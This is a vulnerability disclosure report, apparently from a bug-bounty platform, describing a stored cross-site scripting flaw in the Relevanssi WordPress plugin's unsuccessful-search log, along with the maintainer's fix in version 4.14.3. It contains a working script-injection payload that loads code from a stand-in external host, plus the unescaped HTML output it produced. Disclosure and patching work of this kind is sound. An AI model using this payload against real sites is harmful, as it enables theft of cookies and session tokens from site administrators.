Cross-site Scripting (XSS) - Stored in msaari/relevanssi

Valid

Reported on

Oct 19th 2021


Description

Good afternoon. Beginning on 12 October 2021, our XSS catcher started receiving callbacks from a group of sites that are using the Relevanssi plugin for Wordpress. It appears to us that the software is not properly filtering Unsuccessful searches before displaying the information to the user. One of the sites that we received a blind stored XSS callback from is an offshore private bank. 👀

Proof of Concept

Our payload was sent via the website's search form and was formatted like so: foo"><script src=//xss></script><x=", which was displayed to the user's of your plug-in like so:

<td>foo"&gt;<script src="//xss"></script><x=" <a="" href="https://website/?s=foo%22%3E%3Cscript%20src%3D%2F%2Fxss%3E%3C%2Fscript%3E%3Cx%3D%22"><span class="dashicons dashicons-external"></span></x="></td>
                        <td style="padding: 3px 5px; text-align: center">2</td>

Impact

This flaw allows attackers to pass rogue JavaScript to unsuspecting users. Since the user’s browser has no way to know the script should not be trusted, it will execute the script, which can then access any cookies, session tokens, or other sensitive information retained by the browser and used with your website. In fact, here is a list of 21 other things that hackers can do with an XSS flaw: https://s0md3v.github.io/21-things-xss/

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
Geeknik Labs
2 months ago

Researcher


@admin, am curious if you can use https://wordpress.org/plugins/relevanssi/ when factoring the bounty? It shows 100,000+ active installs, despite the lack of stars on Github. Thank you!

We have contacted a member of the msaari/relevanssi team and are waiting to hear back 2 months ago
msaari
2 months ago

Maintainer


Thanks, I'll fix this. The WordPress.org plugin repo is the main distribution channel for the plugin, so yes, the update will appear there.

msaari
2 months ago

Maintainer


Line 339 in /lib/user-searches.php becomes

$query_link = wp_kses( $query->query, 'strip' );

The fix is now released as version 4.14.3. Relevanssi Premium isn't affected by this. Thanks!

msaari validated this vulnerability 2 months ago
Geeknik Labs has been awarded the disclosure bounty
The fix bounty is now up for grabs
msaari confirmed that a fix has been merged on 4a8168 2 months ago
The fix bounty has been dropped
Geeknik Labs
2 months ago

Researcher


@msaari LGTM, thank you for the fast response!